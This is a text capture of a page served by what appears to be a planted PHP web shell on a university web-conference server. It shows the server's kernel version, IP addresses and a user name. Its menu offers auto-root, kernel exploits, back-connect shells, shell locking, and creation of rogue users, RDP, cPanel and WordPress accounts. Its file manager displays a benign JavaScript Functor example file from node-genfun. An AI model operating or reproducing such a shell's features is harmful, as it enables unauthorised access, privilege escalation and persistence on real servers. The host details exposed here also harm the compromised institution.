Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.137.169.102
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-genfun /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
basic.js
1.24
KB
-rw-r--r--
fmap.js
2.75
KB
-rw-r--r--
hellodog.js
598
B
-rw-r--r--
namespaced_tostring.js
1018
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fmap.js
var genfun = require('../') /* * This file implements an approximation of the Functor instances described * in the Haskell wikibook: * * https://en.wikibooks.org/wiki/Haskell/The_Functor_class */ /** * Generic function used in the Functor typeclass we're simulating in this * file. The typeclass can be instantiated by simply adding the appropriate * methods to fmap, which follow the Functor laws: * * `fmap(identity, value) => value` * `fmap(compose(f, g), value) => f(g(value))` * * And for the sake of JavaScript's `this` we add an additional expectation: * `thing.fmap(function() { return this }, value) => thing` * * @param {function} f - Function to map over the value. * @param {*} value - Value to map over. */ var fmap = genfun() /* * Default method */ fmap.add([], function (f, value) { throw new Error('No instance of (Functor ' + Object.prototype.toString.call(value) + ')' + ' arising from use of `fmap`') }) /* * Maybe */ function Just (value) { this.value = value } var Nothing = {} fmap.add([Function, Just], function (f, just) { return new Just(f.call(this, just.value)) }) fmap.add([Function, Nothing], function () { return Nothing }) /* * Array */ fmap.add([Function, Array], function (f, array) { return array.map(f, this) }) /* * Tree */ function Leaf (value) { this.value = value } function Branch (left, right) { this.left = left this.right = right } fmap.add([Function, Leaf], function (f, leaf) { return new Leaf(f.call(this, leaf.value)) }) fmap.add([Function, Branch], function (f, branch) { return new Branch(fmap.call(this, f, branch.left), fmap.call(this, f, branch.right)) }) function runExample () { function logValue (type) { return function (val) { console.log('Mapping over ', val, ' in object of type ' + type) } } console.log('Testing Maybe') fmap(logValue('Just'), new Just(1)) fmap(logValue('Nothing'), Nothing) console.log('-----------------') console.log('Testing Array') fmap(logValue('Array'), [1,2,3]) console.log('-----------------') console.log('Testing Tree') function br(a, b) { return new Branch(a, b) } function lf(x) { return new Leaf(x) } fmap(logValue('Tree'), br( br( lf(1), lf(2)), br( br( lf(3), br( lf(4), lf(5))), lf(6)))) console.log('-----------------') console.log('Testing default') try { fmap(logValue('Fail'), 'Some random string') } catch(e) { console.log('Caught expected exception: ', e) } } exports.runExample = runExample exports.fmap = fmap if (module.id === '.') runExample()
Close